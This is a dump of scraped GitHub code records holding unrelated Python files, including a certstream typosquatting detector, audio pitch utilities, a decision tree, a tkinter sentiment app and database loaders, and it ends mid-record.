(q[8], q8_qfin5, qf[4]),\n (q[9], q9_qfin3, qf[2]),\n (q[9], q9_qfin4, qf[3]),\n (q[10], q10_q14, q[14]),\n (q[10], q10_q15, q[15]),\n (q[11], q11_qfin1, qf[0]),\n (q[11], q11_qfin6, qf[5]),\n (q[12], q12_qfin3, qf[2]),\n (q[12], q12_qfin1, qf[0]),\n (q[13], q13_qfin3, qf[2]),\n (q[13], q13_qfin4, qf[3]),\n (q[14], q14_qfin3, qf[2]),\n (q[14], q14_qfin6, qf[5]),\n (q[15], q15_qfin3, qf[2]),\n (q[15], q15_qfin6, qf[5]),\n ]\n )\n\n temp.add_start_state(q[0])\n for st in qf:\n temp.add_final_state(st)\n\n return temp\n","repo_name":"SebasEscobarM/StoryGenerator","sub_path":"src/model/Automaton.py","file_name":"Automaton.py","file_ext":"py","file_size_in_byte":12232,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"3850927997","text":"import insightconnect_plugin_runtime\nfrom .schema import SearchCertstreamInput, SearchCertstreamOutput, Input, Output, Component\n\n# Custom imports below\nfrom insightconnect_plugin_runtime.exceptions import PluginException\nimport certstream\nimport re\nimport Levenshtein\nfrom komand_typo_squatter.util import utils\n\n\nclass SearchCertstream(insightconnect_plugin_runtime.Trigger):\n def __init__(self):\n super(self.__class__, self).__init__(\n name=\"search_certstream\",\n description=Component.DESCRIPTION,\n input=SearchCertstreamInput(),\n output=SearchCertstreamOutput(),\n )\n self.domain = \"\"\n self.query = \"\"\n self.levenshtein = 0\n\n def callback(self, message, context): # pylint: disable=unused-argument\n \"\"\"Callback handler for certstream events.\"\"\"\n message_type = message.get(\"message_type\")\n if message_type == \"heartbeat\":\n return\n\n if message_type == \"certificate_update\":\n all_domains = message.get(\"data\", {}).get(\"leaf_cert\", {}).get(\"all_domains\", [])\n\n for domain in all_domains:\n score = utils.score_domain(domain.lower())\n\n # If issued from a free CA = more suspicious\n issued = message.get(\"data\", {}).get(\"leaf_cert\", {}).get(\"issuer\", {}).get(\"O\")\n if issued:\n if \"Let's Encrypt\" in issued:\n score += 10\n if self.query:\n if not re.search(self.query, domain):\n continue\n else:\n if Levenshtein.distance(str(self.domain), str(domain)) > self.levenshtein:\n continue\n self.send({Output.DOMAIN: domain, Output.SCORE: score})\n else:\n raise PluginException(\n cause=\"An unrecognized message type was returned.\", assistance=\"Please contact support.\"\n )\n\n def run(self, params={}):\n \"\"\"Run the trigger\"\"\"\n self.query = params.get(Input.QUERY)\n self.levenshtein = params.get(Input.LEVENSHTEIN)\n self.domain = params.get(Input.DOMAIN)\n certstream.listen_for_events(self.callback, \"wss://certstream.calidog.io\")\n","repo_name":"rapid7/insightconnect-plugins","sub_path":"plugins/typo_squatter/komand_typo_squatter/triggers/search_certstream/trigger.py","file_name":"trigger.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"73"} +{"seq_id":"39401480948","text":"import numpy as np\nfrom utils.constants import *\nfrom scipy import signal\n\ndef autocorrelation(x_win, sr=SAMPLE_RATE, minF0=MIN_F0, maxF0=MAX_F0):\n \"\"\"F0 detection on a single frame using autocorrelation\n \n Args:\n x_win: numpy.array of the windowed signal frame\n fs: Sampling rate\n minF0: Min F0 limit\n maxF0: Max F0 limit\n \n Returns:\n ValAC: numpy.array of the autocorrelation values.\n f0: numpy.array f values for those ValAC values\n \"\"\"\n f0 = np.array([])\n minT0 = int(np.round(sr/maxF0))\n maxT0 = int(np.round(sr/minF0))\n\n Ts = range(minT0, maxT0)\n ValAC = np.array([])\n\n for k in Ts:\n x_win_shifted = np.hstack((np.zeros(k), x_win[:-k]))\n autoCorr = np.dot(x_win, x_win_shifted)\n ValAC = np.append(ValAC, autoCorr)\n\n f0 = np.divide(sr*np.ones(len(Ts)), Ts)\n return ValAC, f0\n\ndef get_peaks(sig:list, xticks:list):\n \"\"\"Returns the x,y values of the peaks in sig\n\n Args:\n sig: numpy.array of the signal of which to fing the peaks\n xticks: numpy.array of the corresponding x axis values for sig\n\n Returns:\n yval: y values of the peaks\n xval: x values of the peaks\n \"\"\"\n\n if len(sig) != len(xticks):\n raise ValueError(\"xticks and sig must have the same length\")\n\n peaks, _ = signal.find_peaks(sig)\n\n tuplelist = [(a, b) for a, b in zip(xticks[peaks], sig[peaks])]\n tuplelist.sort(key=lambda x: x[1], reverse=True)\n\n yval = [a for a, b in tuplelist]\n xval = [b for a, b in tuplelist]\n\n return yval, xval\n\ndef framesReduction(frames_mat):\n \"\"\"Modifies frames_mat to only contain the three first elements in each element\n\n Args:\n frames_mat: list of frames\n\n Returns:\n frames_mat: modified list of frames\n \"\"\"\n\n for i, frame in enumerate(frames_mat):\n\n upper = min(3, len(frame))\n frames_mat[i] = frame[:upper]\n\n return frames_mat\n\ndef smooth_function(sig, window_type= 'triang', window_len = 50, mode = 'same'):\n return np.convolve(sig, signal.get_window(window_type, window_len), mode=mode)\n\ndef apply_threshold(sig,th):\n \"\"\"Apply threshold to a signal \n \n Args:\n sig: numpy.array of the signal to be thresholded\n th: threshold value over one\n \n Returns:\n sig: thresholded signal\n \"\"\"\n sig = sig / np.max(sig)\n sig[sig < th] = 0\n sig[sig >= th] = 1\n return sig\n\ndef freq2MIDI(freq):\n \"\"\"Converts frequency values array to midi values array\n\n Args:\n freq: numpy.array containing the frequencies\n\n Returns:\n midi: numpy.array containing the midi (non quantized) values.\n\n \"\"\"\n freq = np.clip(freq, a_min=8.175, a_max=12543.854)\n midi = np.log2(freq/440.0) * 12 + 69\n return midi\n\ndef apply_masks(array, *args):\n \"\"\"Apply masks to array\n \n Args:\n array: numpy.array of the signal to be masked\n *args: list of the masks to be applied\n \n Returns:\n array: masked array\n \"\"\"\n for arg in args:\n array = np.multiply(array, arg)\n return array\n ","repo_name":"MarcSM/predominant-pitch-extraction-in-polyphonic-signals","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"74343372075","text":"import pygame as pg\n\nfrom .. import prepare\nfrom .label import Label\n\n\nclass ToggleButton:\n def __init__(self, text, topleft, callback, font_size=35, *args):\n self.text = text\n self.callback = callback\n self.font_size = font_size\n self.args = args\n self.create_images()\n self.image = self.image_idle\n self.rect = self.image.get_rect(topleft=topleft)\n self.hovered = False\n self.active = False\n\n def calculate_size(self):\n label = Label(self.text, self.font_size)\n width = label.rect.width + 20\n height = label.rect.height + 10\n return width, height\n\n def create_images(self):\n width, height = self.calculate_size()\n rect = pg.rect.Rect(0, 0, width, height)\n label = Label(self.text, self.font_size, center=rect.center)\n self.image_idle = pg.transform.scale(\n prepare.GFX['ui']['button_idle'], (width, height))\n label.draw(self.image_idle)\n self.image_hover = pg.transform.scale(\n prepare.GFX['ui']['button_hover'], (width, height))\n label.draw(self.image_hover)\n self.image_active = pg.transform.scale(\n prepare.GFX['ui']['button_active'], (width, height))\n label.draw(self.image_active)\n\n def hover(self):\n self.hovered = True\n if not self.active:\n self.image = self.image_hover\n\n def unhover(self):\n self.hovered = False\n if not self.active:\n self.image = self.image_idle\n\n def click(self):\n if self.hovered:\n if self.active:\n self.deactivate()\n else:\n self.activate()\n self.callback(*self.args)\n\n def activate(self):\n self.active = True\n self.image = self.image_active\n\n def deactivate(self):\n if self.active:\n self.active = False\n if self.hovered:\n self.image = self.image_hover\n else:\n self.image = self.image_idle\n\n def draw(self, surface):\n surface.blit(self.image, self.rect)\n\n def update(self):\n if self.rect.collidepoint(pg.mouse.get_pos()):\n if not self.hovered:\n self.hover()\n else:\n if self.hovered:\n self.unhover()\n\n\nclass GroupButton(ToggleButton):\n def click(self):\n # we go here only if button is not active\n if self.hovered:\n # if self.active:\n # self.deactivate()\n self.activate()\n self.callback(*self.args)\n","repo_name":"Cactusson/mazes","sub_path":"data/components/toggle_button.py","file_name":"toggle_button.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"5737064456","text":"# simple script to run the lumberjack 2d grid world from mesa-gym\n\n# add filenames to this dict if you want to use a trained model for some entities\n# eg. trained_models[id] = \"\"\ntrained_models = {}\ntrained_models[\"StrongLumberjack\"] = \"models/StrongLumberjack_lumberjack-qlearning_selfishness_500_0.05_1.0_0.004_0.1.pickle\"\ntrained_models[\"WeakLumberjack\"] = \"models/WeakLumberjack_lumberjack-qlearning_selfishness_500_0.05_1.0_0.004_0.1.pickle\"\n\nimport mesa_gym.gyms.grid.lumberjack.env as e\nenv = e.MesaLumberjackEnv(render_mode=\"human\")\n\nimport os\npath = os.path.dirname(os.path.abspath(__file__))\n\nimport numpy as np\nimport pickle\n\ndef load_trained_models(trained_models):\n q_tables = {}\n for agent_type in trained_models.keys():\n with open(trained_models[agent_type], \"rb\") as f:\n q_tables[agent_type] = pickle.load(f)\n return q_tables\n\n# load q_tables from trained models\nq_tables = load_trained_models(trained_models)\n\n# start environment\nobservations, info = env.reset()\n\nfor _ in range(100):\n actions = {}\n for agent in env.agents:\n id = agent.unique_id\n agent_type = type(agent).__name__\n observation = tuple(observations[id])\n if agent_type in trained_models:\n if observation not in q_tables[agent_type]:\n action = env.action_space[id].sample()\n agent.trace(\"UNKNOWN CONDITION in my Qtable: random extraction\")\n else:\n action = int(np.argmax(q_tables[agent_type][observation]))\n else:\n action = env.action_space[id].sample()\n actions[id] = action\n\n observations, rewards, terminated, truncated, info = env.step(actions=actions)\n\n if terminated or truncated:\n exit(1)\n observations, info = env.reset()\n\nenv.close()","repo_name":"gsileno/mesa-gym","sub_path":"mesa_gym/gyms/grid/lumberjack/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"6820580245","text":"import os\nimport csv\n\n# Set up path to read csv \nbank_csv = os.path.join(\"Resources\",\"budget_data.csv\")\n\n# Opened & Read file into reader\nwith open(bank_csv) as csvfile:\n csv_reader = csv.reader(csvfile, delimiter=\",\")\n\n # Set up variables for future use\n total_months = 0\n total_profit= 0\n avg_change = 0\n gain_max = 0\n loss_max = 0\n\n # Took in Header data\n header = next(csv_reader)\n\n # Created a loop to count the total months (rows) in the data set & calculated the total profit in the set\n for row in csv_reader:\n total_months += 1\n total_profit = total_profit + int(row[1])\n \n # Searched for the max gain by comparing the entry to the current highest\n if int(row[1]) > int(gain_max):\n gain_max = row[1]\n gain_date = row[0]\n # performed the inverse of above for the max loss\n if int(row[1]) < int(loss_max):\n loss_max = row[1]\n loss_date = row[0]\n\n # Printed out the results of the analysis to the user in the terminal\n print(\"Financial Analysis\")\n print(\"----------------------------\")\n print(f\"Total Months: {total_months}\")\n print(f\"Total: ${total_profit}\")\n # Calculated the average change for each month\n avg_change = total_profit / total_months\n print(f\"Average Change: ${avg_change}\")\n print(f\"Greatest Increase in Profits: {gain_date} (${gain_max})\")\n print(f\"Greatest Decrease in Profits: {loss_date} (${loss_max})\")\n\n# Output the same results as above to an analysis text file for the user\nbank_output = os.path.join(\"Analysis\",\"analysis.txt\")\nwith open(bank_output,'w') as f:\n f.write(\"Financial Analysis\\n\")\n f.write(\"----------------------------\\n\")\n f.write(f\"Total Months: {total_months}\\n\")\n f.write(f\"Total: ${total_profit}\\n\")\n f.write(f\"Average Change: ${avg_change}\\n\")\n f.write(f\"Greatest Increase in Profits: {gain_date} (${gain_max})\\n\")\n f.write(f\"Greatest Decrease in Profits: {loss_date} (${loss_max})\\n\")","repo_name":"wreinhold/python-challenge","sub_path":"PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"719418294","text":"class Block:\n BlkID = -1 # This is incremented every time we attempt to create a block\n def __init__(self, parent, txns, broadcastTime):\n \n Block.BlkID += 1\n self.id = Block.BlkID\n self.parent = parent # ID of parent of this block\n self.txns = txns # List of Txns (with coinbase as last entry)\n self.broadcastTime = broadcastTime # Time at which block was mined and broadcasted\n self.accepted = False # Voting is succesful\n self.votes = 0 # Number of votes received in voting","repo_name":"shashankiit/CS762-DtDPos-Project","sub_path":"block.py","file_name":"block.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"38277515562","text":"import sys\nsys.path.append('\\bin\\common')\nimport db_config as db\nfrom leagueoflegends import leagueoflegends_utils as utils\n\nimport mysql.connector\n\nurl='https://oracleselixir-downloadable-match-data.s3-us-west-2.amazonaws.com/2020_LoL_esports_match_data_from_OraclesElixir_20200810.csv'\nutils.download_rawdata_csv(url)\n\n\n#######################################################reading data from csv##########################################################\n\nimport csv\n\nwith open('input.csv', newline='') as f:\n reader = csv.reader(f)\n data = list(reader)\n\n\n\n# print(data[0])\n\n\n\n#######################################################reading data from csv###########################################################\n\nfstr=\"\"\n\nfor col in data[0]:\n\tfstr=fstr+col.replace(\" \",\"_\")+\" varchar(20) \"+\",\\n \"\n\n\n\n# print(fstr[:-2])\n\n\ncreatequery=f\"create table if not EXISTS raw_data ({fstr[:-3]} )\"\n\n\n\nprint(createquery)\n\ndb.mycursor.execute(createquery)\n\ndb.mydb.commit()\n\n\nsql = \"truncate raw_data\"\n\n\ndb.mycursor.execute(sql)\n\n\n\ndb.mydb.commit()\n\n\n\n\n\n\nfor i in range(1,len(data)):\n\n\n\tstr2=\"\"\n\n\tfor val in data[i]:\n\t\tstr2=str2+\"'\"+val+\"'\"+\",\"\n\n\tdatas=f\"INSERT INTO raw_data VALUES ({str2[:-1]})\"\n\t# print(datas)\n\tmycursor.execute(datas)\n\tmydb.commit()\n\n\tprint(\"exception handeled\")\n\n\n\n\t\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# print(data)\n","repo_name":"eGamingData/crawlers-egamingdata","sub_path":"bin/lol_crawlers/raw_data/raw_data.py","file_name":"raw_data.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"14062302339","text":"num = int(input())\n\ndef hansu(num):\n ans = 0\n for i in range(1,num+1):\n if i <= 99 :\n ans = ans + 1\n else :\n nums = list(map(int, str(i)))\n if nums[0]-nums[1] == nums[1]-nums[2]:\n ans = ans + 1\n\n return ans\n\nprint(hansu(num))\n ","repo_name":"ssong915/Algorithm-PS","sub_path":"BOJ/Level6/1065.py","file_name":"1065.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"29132986993","text":"from __future__ import division\nfrom __future__ import print_function\n\nimport logging\n\nfrom math import floor, ceil\nfrom copy import copy\nfrom typing import Tuple, List\n\nfrom ngraph_onnx import TYPE_CHECKING\n\nfrom ngraph.impl import Node as NgraphNode\n\nimport ngraph as ng\n\nfrom ngraph.utils.types import get_dtype\n\nlog = logging.getLogger(__name__)\n\nif TYPE_CHECKING:\n from ngraph_onnx.onnx_importer.model_wrappers import NodeWrapper\n\n\ndef get_pads(onnx_node, kernel_shape=None):\n # type: (NodeWrapper, List[int]) -> Tuple[List[int], List[int]]\n \"\"\"\n Get padding values for the operation described by an ONNX node.\n\n If `auto_pad` attribute is specified as SAME_UPPER or SAME_LOWER, or VALID values are\n calculated. Otherwise values are taken from the `pads` attribute.\n\n `pads` value should follow [x1_begin, x2_begin..., x1_end, x2_end,...]\n\n :param onnx_node: wrapped ONNX node for Conv or Pool operation\n :return: tuple of numbers of pixels to pad (height, width, depth)\n \"\"\"\n auto_pad = onnx_node.get_attribute_value('auto_pad')\n pads = onnx_node.get_attribute_value('pads', ()) # Padding along each axis\n if(kernel_shape is None):\n kernel_shape = get_kernel_shape(onnx_node)\n\n if len(pads) == 0:\n pads = [0] * len(kernel_shape)\n\n # Attribute 'auto_pad' is deprecated, but is currently used by CNTK.\n if auto_pad == 'VALID':\n pads = [0, 0] * len(kernel_shape)\n\n elif auto_pad == 'SAME_UPPER' or auto_pad == 'SAME_LOWER':\n # SAME_UPPER or SAME_LOWER mean pad the input so that the output size match the input.\n # In case of odd number add the extra padding at the end for SAME_UPPER and at the\n # beginning for SAME_LOWER.\n def pad_value(kernel_dim): # type: (int) -> float\n return (kernel_dim - 1.0) / 2.0\n\n pads_starts = [floor(pad_value(dim)) if auto_pad == 'SAME_UPPER' else\n ceil(pad_value(dim)) for dim in kernel_shape]\n pads_ends = [ceil(pad_value(dim)) if auto_pad == 'SAME_UPPER' else\n floor(pad_value(dim)) for dim in kernel_shape]\n pads = pads_starts + pads_ends\n\n if len(pads) <= 3:\n padding_above = pads\n padding_below = pads\n else:\n padding_above = pads[:len(pads) // 2]\n padding_below = pads[len(pads) // 2:]\n\n return padding_above, padding_below\n\n\ndef get_kernel_shape(onnx_node): # type: (NodeWrapper) -> List[int]\n \"\"\"\n Get shape of kernel (filter) in pixels.\n\n :param onnx_node: wrapped ONNX node for Conv or Pool operation\n :return: tuple of numbers representing kernel shape (height, width, depth)\n \"\"\"\n kernel_shape = onnx_node.get_attribute_value('kernel_shape', ())\n\n if len(kernel_shape) == 0:\n kernel_shape = [1, 1]\n\n return kernel_shape\n\n\ndef get_strides(onnx_node, kernel_shape=None): # type: (NodeWrapper, List[int]) -> List[int]\n \"\"\"\n Get number of pixels to stride operation by in each direction.\n\n :param onnx_node: wrapped ONNX node for Conv or Pool operation\n :return: tuple of numbers of pixels to stride by (height, width, depth)\n \"\"\"\n strides = onnx_node.get_attribute_value('strides', ()) # stride along each axis\n if kernel_shape is None:\n kernel_shape = get_kernel_shape(onnx_node)\n\n if len(strides) == 0:\n strides = [1] * len(kernel_shape)\n\n return strides\n\n\ndef get_dilations(onnx_node): # type: (NodeWrapper) -> List[int]\n \"\"\"\n Get number of pixels for filter dilation in each direction.\n\n :param onnx_node: wrapped ONNX node for Conv or Pool operation\n :return: tuple of numbers of pixels for filter dilation (height, width, depth)\n \"\"\"\n dilations = onnx_node.get_attribute_value('dilations', ()) # dilation along each axis\n kernel_shape = get_kernel_shape(onnx_node)\n\n if len(dilations) == 0:\n dilations = [1] * len(kernel_shape)\n\n return dilations\n\n\ndef make_convolution_op(onnx_node, ng_inputs):\n # type: (NodeWrapper, List[NgraphNode]) -> NgraphNode\n \"\"\"\n Create an ngraph convolution Op based on an ONNX node.\n\n :param onnx_node: wrapped ONNX node for Conv of ConvTranspose op\n :param ng_inputs: ngraph TensorOp input tensors\n :return: ngraph Op for convolution or deconvolution\n \"\"\"\n if len(ng_inputs) == 3:\n data, weights, bias = ng_inputs\n elif len(ng_inputs) == 2:\n data, weights = ng_inputs\n bias = ng.constant(0, dtype=get_dtype(data.get_element_type()))\n else:\n raise ValueError('Conv node (%s): unexpected number of input values: %d.',\n onnx_node.name, len(ng_inputs))\n\n groups = onnx_node.get_attribute_value('group', 1)\n\n strides = get_strides(onnx_node)\n dilation = get_dilations(onnx_node)\n padding_below, padding_above = get_pads(onnx_node)\n if groups != 1:\n # Split one convolution op to N ops where N is the number of groups and concat results after computation.\n # reference: https://github.com/NervanaSystems/ngraph-mxnet/blob/fdd692/src/ngraph/ngraph_emitter.cc#L822-L856\n data_shape = list(data.shape)\n weights_shape = list(weights.shape)\n convolutions_nodes = []\n\n # initial bounds for splice\n data_lower_part = len(data_shape) * [0]\n data_upper_part = copy(data_shape)\n\n weights_lower_part = len(weights_shape) * [0]\n weights_upper_part = copy(weights_shape)\n\n for group in range(groups):\n # update bounds for splice\n data_lower_part[1] = group * int((data_shape[1] / groups))\n data_upper_part[1] = (group + 1) * int((data_shape[1] / groups))\n\n sliced_data = ng.slice(data, data_lower_part, data_upper_part)\n\n # update bounds for splice\n weights_lower_part[0] = group * int((weights_shape[0] / groups))\n weights_upper_part[0] = max((group + 1) * int((weights_shape[0] / groups)), 1)\n\n sliced_weights = ng.slice(weights, weights_lower_part, weights_upper_part)\n convolutions_nodes.append(ng.convolution(sliced_data, sliced_weights, strides,\n dilation, padding_below, padding_above))\n conv = ng.concat(convolutions_nodes, axis=1)\n else:\n conv = ng.convolution(data, weights, strides, dilation, padding_below, padding_above)\n if len(bias.shape) > 0:\n return conv + ng.broadcast_to(bias, conv.shape, 1)\n else:\n return conv\n","repo_name":"chilung/dllab-5-1-ngraph","sub_path":"lib/python3.5/site-packages/ngraph_onnx/onnx_importer/utils/conv.py","file_name":"conv.py","file_ext":"py","file_size_in_byte":6480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"1954273557","text":"import FreeCADGui\nimport FreeCAD\n\nfrom .TaskPanel_Functions_Add import FunctionsTaskPanelAdd\n\nfrom .Interface_Checks import isOpticalSystemObserver\n\n\nclass CreateFunctionTool:\n \"Tool for creating function object\"\n\n def GetResources(self):\n return {\"Pixmap\": \":/icons/pyrate_func_icon.svg\",\n \"MenuText\": \"Create function ...\",\n \"Accel\": \"\",\n \"ToolTip\": \"Generates function object in document\"\n }\n\n def IsActive(self):\n if FreeCAD.ActiveDocument is None:\n return False\n else:\n return True\n\n def Activated(self):\n\n doc = FreeCAD.ActiveDocument\n\n osobservers = []\n for obj in doc.Objects:\n if isOpticalSystemObserver(obj):\n osobservers.append(obj)\n\n panel = FunctionsTaskPanelAdd(doc, [oso.Label for oso in osobservers])\n FreeCADGui.Control.showDialog(panel)\n\n\nFreeCADGui.addCommand('CreateFunctionsCommand', CreateFunctionTool())\n","repo_name":"mess42/pyrate","sub_path":"freecad/PyrateWorkbench/Commands_Functions.py","file_name":"Commands_Functions.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":156,"dataset":"github-code","pt":"73"} +{"seq_id":"23764919903","text":"import tkinter as tk\r\nfrom textblob import TextBlob\r\nfrom cleaner import *\r\n\r\ndef handle_click():\r\n user_input = text_box.get(\"1.0\",\"end-1c\")\r\n # blob = TextBlob(user_input)\r\n # sentiment = \"positive\" if blob.sentiment.polarity>0 else \"negative\"\r\n sentiment = check_sentiment(user_input)\r\n if sentiment==\"positive\":\r\n result_label.config(text=f'Review is {sentiment}',fg=\"white\",bg=\"green\")\r\n else:\r\n result_label.config(text=f'Review is {sentiment}',fg=\"white\",bg=\"red\")\r\n \r\n\r\nwindow = tk.Tk()\r\nwindow.title(\"Sentiment analysis\")\r\n\r\ntext_label = tk.Label(window,text=\"Write or paste your review here\")\r\ntext_label.pack(pady=10)\r\n\r\ntext_box = tk.Text(window,width=50,height=15)\r\ntext_box.pack(pady=10,fill=tk.BOTH, expand=True)\r\n\r\nresult_label = tk.Label(window, text=\"\")\r\nresult_label.pack(padx=5)\r\n\r\ncheck_button = tk.Button(window, text=\"Check sentiment analysis\", command=handle_click, cursor=\"hand2\",fg=\"white\",bg=\"black\")\r\ncheck_button.pack(pady=10)\r\n\r\nwindow.mainloop()","repo_name":"Jula143/Sentyment-analysis","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"42224641333","text":"from dataAccess.FlightRepository import FilghtRepository\nfrom common.entities.db_config import local_session, create_all_entities\nfrom common.entities.db_conifg_procedured import load_db_scripts\nfrom common.entities.Customer import Customer\nfrom common.entities.Flight import Flight\nfrom common.entities.Ticket import Ticket\nimport random\nimport math\nimport datetime\n\nfrom sqlalchemy import func\n\nITERATIONS = 5000\n\nseats_models = [\n {'seats' : 120, 'rows': 20, 'cols': 6},\n {'seats' : 180, 'rows': 30, 'cols': 6},\n {'seats' : 200, 'rows': 25, 'cols': 8},\n {'seats' : 240, 'rows': 24, 'cols': 10},\n {'seats' : 300, 'rows': 30, 'cols': 10}\n]\n\nclass generate_tickets_bank:\n def __init__(self):\n create_all_entities()\n load_db_scripts()\n self.repository = FilghtRepository(local_session)\n\n def generate(self):\n customers = self.repository.get_all(Customer)\n customer_count = len(customers)\n\n #flights\n # start_date = datetime.datetime(2022, 9, 1)\n # end_date = datetime.datetime(2022, 9, 30)\n # flight_condition = (lambda query: query.filter(Flight.departure_time >=start_date,\n # Flight.departure_time <=end_date))\n flights = self.repository.get_all(Flight)\n flights_count = len(flights)\n\n for i in range(5000):\n # get random customer\n customer_index = math.floor(random.random() * customer_count)\n customer = customers[customer_index]\n\n # get random flight\n # primary key (flight, customer) mustn't be violated\n # flight only with remaining_tickets >0\n # no customer cross flights\n while True:\n flight_index = math.floor(random.random() * flights_count)\n flight = flights[flight_index]\n db_flight = self.repository.get_by_id(Flight, flight.id)\n if db_flight.remaining_tickets == 0:\n continue\n flight_customer_condition = (lambda query: query.filter(Ticket.flight_id == db_flight.id,\n Ticket.customer_id == customer.id))\n flight_customer_tickets = self.repository.get_all_by_condition(Ticket, flight_customer_condition)\n if len(flight_customer_tickets) >0:\n continue\n db_cross_flights = self.repository.get_customer_cross_flight(customer.id, db_flight.id)\n if len(db_cross_flights) > 0:\n continue\n break\n # flight matched\n model = self.get_seats_model(db_flight.num_seats)\n\n # get position\n while True:\n row_count = model['rows']\n columns_count = model['cols']\n random_row = math.floor(random.random() * row_count)\n random_col = math.floor(random.random() * columns_count)\n format_position = f'{random_row + 1}-{random_col + 1}'\n\n ticket_pos_condition = (lambda query: query.filter(Ticket.flight_id == db_flight.id,\n Ticket.position == format_position))\n match_position_ticket = self.repository.get_all_by_condition(Ticket, ticket_pos_condition)\n is_match_ticket = len(match_position_ticket) == 0\n if is_match_ticket:\n break\n\n # postion selected\n # insert new ticket\n ticket_price = db_flight.price\n new_ticket = Ticket(flight_id=db_flight.id,\n customer_id=customer.id,\n position=format_position,\n price=ticket_price)\n\n remaining_tickets = db_flight.remaining_tickets - 1\n self.repository.add_ticket(new_ticket, remaining_tickets)\n\n print(f'Inseted Num {i}')\n\n def get_seats_model(self, num_seats):\n for model in seats_models:\n if model['seats'] == num_seats:\n return model\n return None\n\nbank = generate_tickets_bank()\nbank.generate()\n\nprint('Done! ')","repo_name":"danielMarmor/FlightRepositoryProject","sub_path":"dbGenerator/genrate_tickets_bank.py","file_name":"genrate_tickets_bank.py","file_ext":"py","file_size_in_byte":4253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"34933458271","text":"import numpy as np\nimport utils as Util\n\nclass DecisionTree():\n def __init__(self):\n self.clf_name = \"DecisionTree\"\n self.root_node = None\n\n def train(self, features, labels):\n # features: List[List[float]], labels: List[int]\n # init\n assert (len(features) > 0)\n num_cls = np.unique(labels).size\n\n # build the tree\n self.root_node = TreeNode(features, labels, num_cls)\n if self.root_node.splittable:\n self.root_node.split()\n\n return\n\n def predict(self, features):\n # features: List[List[any]]\n # return List[int]\n y_pred = []\n for idx, feature in enumerate(features):\n pred = self.root_node.predict(list(feature))\n y_pred.append(pred)\n return y_pred\n\n\nclass TreeNode(object):\n def __init__(self, features, labels, num_cls):\n # features: List[List[any]], labels: List[int], num_cls: int\n self.features = np.array(features)\n self.labels = labels\n self.children = []\n self.num_cls = num_cls\n branch = []\n # find the most common labels in current node\n count_max = 0\n for label in np.unique(labels):\n branch.append(self.labels.count(label))\n if branch[-1] > count_max:\n count_max = labels.count(label)\n self.cls_max = label\n # splittable is false when all features belongs to one class\n self.entropy = Util.calculate_entropy(branch)\n if len(np.unique(labels)) < 2 or len(self.features[0]) == 0:\n self.splittable = False\n else:\n self.splittable = True\n self.dim_split = None # the index of the feature to be split\n self.feature_uniq_split = None # the possible unique values of the feature to be split\n\n #TODO: try to split current node\n def split(self):\n self.best_info_gain = float('-inf')\n self.best_attribute_values = []\n\n for attribute_index in range(len(self.features[0])):\n branch = dict()\n for attribute_value in sorted(set(self.features[:, attribute_index])):\n branch[attribute_value] = [0] * self.num_cls\n label_map = sorted(set(self.labels))\n for label_index, label in enumerate(self.labels):\n branch[self.features[label_index, attribute_index]][label_map.index(label)] \\\n = branch.get(self.features[label_index, attribute_index], 0)[label_map.index(label)] + 1\n current_info_gain = Util.Information_Gain(self.entropy, list(branch.values()))\n\n if (current_info_gain != 0) and ((current_info_gain > self.best_info_gain) or\n (current_info_gain == self.best_info_gain and len(branch) > self.feature_uniq_split)):\n self.best_info_gain = current_info_gain\n self.dim_split = attribute_index\n self.feature_uniq_split = len(branch)\n self.best_attribute_values = list(branch.keys())\n\n if self.best_info_gain != float('-inf'):\n # split the best attribute and create children\n child_feature_array = np.column_stack((self.features[:, :self.dim_split], self.features[:, self.dim_split+1:]))\n for attribute_value in self.best_attribute_values:\n subset_of_indices = np.where(self.features[:, self.dim_split] == attribute_value)[0]\n child_labels = np.array(self.labels)[subset_of_indices].tolist()\n self.children.append(TreeNode(child_feature_array[subset_of_indices].tolist(), child_labels,\\\n len(set(child_labels))))\n if self.children[-1].splittable:\n self.children[-1].split()\n else:\n self.splittable = False\n return\n\n # TODO: predict the branch or the class\n def predict(self, feature):\n # feature: List[any]\n # return: int\n # for attribute in\n if self.splittable and self.dim_split is z:\n attribute_value = feature.pop(self.dim_split)\n return self.children[self.best_attribute_values.index(attribute_value)].predict(feature)\n else:\n return self.cls_max\n","repo_name":"Keerthivasan13/CSCI567-Machine_Learning","sub_path":"Decision Tree/hw1_dt.py","file_name":"hw1_dt.py","file_ext":"py","file_size_in_byte":4242,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"35546770282","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\nfrom __future__ import unicode_literals\n\nAUTHOR = 'Thomas Cole'\nSITENAME = 